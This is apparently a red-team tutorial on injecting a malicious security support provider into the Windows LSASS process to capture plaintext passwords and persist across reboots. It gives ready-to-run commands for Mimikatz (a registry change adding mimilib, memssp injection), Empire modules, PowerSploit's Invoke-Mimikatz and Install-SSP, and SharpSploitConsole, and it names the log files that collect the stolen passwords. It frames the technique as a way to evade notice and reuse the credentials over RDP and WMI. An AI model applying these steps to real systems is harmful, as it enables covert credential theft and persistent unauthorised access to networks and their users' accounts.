Security support provider (SSP) is a Windows API which is used to extend the Windows authentication mechanism. The LSASS process is loading the security support provider DLL’s during Windows startup. This behavior allows a red team operator to either drop an arbitrary SSP DLL in order to interact with the LSASS process and log all passwords stored in this process or to directly patch the process with a malicious SSP without touching the disk.

This technique can be used to collect credentials in a system or in a number of systems and use these credentials in conjunction with another protocol such as RDP, WMI etc. to create persistence in the network by staying off the radar. Injection of a malicious security support provider to a host requires administrator level privileges and there are two methods which can be used:

1. Registering SSP DLL
2. In-Memory

Mimikatz, Empire and PowerSploit support both methods and can be utilized during a red team operation.

Mimikatz

The project Mimikatz provides a DLL file (mimilib.dll) which can be dropped into the same location as the LSASS process (System32) in order to obtain credentials in plain-text for any user that is accessing the compromised host.

C:\Windows\System32\

Following the transferring of the file to the above location a registry key needs to be modified to include the new security support provider mimilib.

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

Reviewing the Security Packages registry key will verify that the malicious security support provider has been injected.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

This method will persist across reboots since the registry has been tampered and the DLL is stored in the system. When users of the domain authenticate again with the system a new file will be created called kiwissp that will log the credentials of the accounts.

C:\Windows\System32\kiwissp.log

Alternatively Mimikatz support the option for an in memory technique by injecting the LSASS with a new security support provider (SSP). This technique doesn’t require mimilib.dll to be dropped into disk or to create the registry key. However, the drawback is that is not persisting during a reboot.

privilege::debug
misc::memssp

When a user authenticates again with the system a log file will be created in the System32 that will contain the password of the user in plain-text.

C:\Windows\System32\mimilsa.log

Empire

Empire provides two modules which can be used to enumerate existing SSP’s and to install a malicious SSP on the target system. The enumeration module will use by default the active agent and doesn’t require any additional configuration.

usemodule persistence/misc/get_ssps
execute

Similarly querying directly the registry can obtain the values of the SSP’s that exist.

shell reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

Copying the malicious security support provider to System32 and updating the registry key will conclude the technique.

shell copy mimilib.dll C:\Windows\System32\

The process can be automated as Empire contains a module that will copy automatically the DLL file to System32 and will create the registry key. The only requirement is to set the path of the mimilib.dll file on the host.

usemodule persistence/misc/install_ssp*
set Path C:\Users\Administrator\mimilib.dll
execute

Empire supports also a script which can execute custom Mimikatz commands.

usemodule credentials/mimikatz/command
set Command misc::memssp
execute

The injection of the malicious SSP in the memory of the process is also supported by Empire. The following module will invoke the Mimikatz script and execute the memssp command directly as another method to automate the technique.

usemodule persistence/misc/memssp*
execute

PowerSploit

PowerSploit contains two scripts which can perform the same task. From the PowerShell variation of Mimikatz “Invoke-Mimikatz” executing the following commands will use the in memory technique.

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command "misc::memssp"

Alternatively transferring the malicious SSP DDL file to the target host and using the module Install-SSP will copy the DLL to System32 and will modify the relevant registry key automatically.

Import-Module .\PowerSploit.psm1
Install-SSP -Path .\mimilib.dll

SharpSploitConsole

Mimikatz is integrated into SharpSploitConsole which is an application designed to interact with SharpSploit which was released by Ryan Cobb. SharpSploit is a .NET post exploitation library which has similar capability to PowerSploit. Currently SharpSploitConsole supports the in-memory technique through the Mimikatz module.

SharpSploitConsole_x64.exe Interact
Mimi-Command misc::memssp

References

• https://adsecurity.org/?p=1760
• https://attack.mitre.org/techniques/T1101/
• https://github.com/anthemtotheego/SharpSploitConsole
• https://github.com/PowerShellMafia/PowerSploit
• https://blog.xpnsec.com/exploring-mimikatz-part-2/